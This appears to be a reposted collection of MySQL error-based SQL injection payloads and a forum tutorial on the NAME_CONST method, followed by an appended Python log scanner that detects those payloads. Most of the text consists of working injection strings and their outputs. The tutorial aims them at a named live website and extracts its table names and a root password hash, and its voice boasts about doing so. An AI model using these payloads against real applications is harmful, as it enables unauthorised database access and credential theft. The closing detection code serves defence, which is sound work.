1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the version() expression with the subquery whose result you want to see.

For example, to retrieve the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection trick for newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the name_const method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
| 1    |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST when trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
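As an added defender-side example (not part of the original post and not the tutorial author's code), the following Python flags the four error-based payload shapes shown on this page (floor(rand(0)*2) with GROUP BY, extractvalue(), updatexml(), and the doubled NAME_CONST() subquery) in web-server access logs, and checks whether a response body leaks the MySQL error strings those payloads rely on. The log lines, the 203.0.113.x addresses and the /article.php path are constructed for the example.

```python
import re
from urllib.parse import unquote_plus
# Request-side signatures of the four MySQL error-based techniques on this page:
# floor(rand(0)*2) under GROUP BY, extractvalue(), updatexml(), and the doubled
# NAME_CONST() subquery that forces a "Duplicate column name" error.
PAYLOAD_SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const_dup": re.compile(r"name_const\s*\(.*name_const\s*\(", re.I | re.S),
}
# Response-side strings: the MySQL errors these payloads provoke. If they show up
# in an HTTP body, raw database errors are reaching the client.
LEAK_SIGNATURE = re.compile(
    r"Duplicate entry '[^']*' for key 'group_key'|XPATH syntax error|Duplicate column name")
# Combined log format: ip - - [time] "METHOD path HTTP/x" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify_query(raw_query: str) -> list[str]:
    """Names of the error-based payload signatures found in a URL query string."""
    decoded = unquote_plus(raw_query)  # decode '+' and %XX as the web server would
    return [name for name, rx in PAYLOAD_SIGNATURES.items() if rx.search(decoded)]

def scan_access_log(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, path, signatures) for each request carrying a payload."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        path, _, query = target.partition("?")
        found = classify_query(query)
        if found:
            hits.append((ip, path, found))
    return hits

def response_leaks_db_error(body: str) -> bool:
    """True if a response body contains one of the MySQL error strings above."""
    return LEAK_SIGNATURE.search(body) is not None

# Constructed sample log lines (documentation IP range, hypothetical path).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 231',
    '203.0.113.7 - - [10/Oct/2023:13:55:42 +0000] "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+user()))) HTTP/1.1" 500 198',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /article.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 205',
]
```

The request-side patterns are deliberately narrow to the forms on this page; the response-side check is the more durable control, because an application that never returns raw database errors gives these techniques nothing to read.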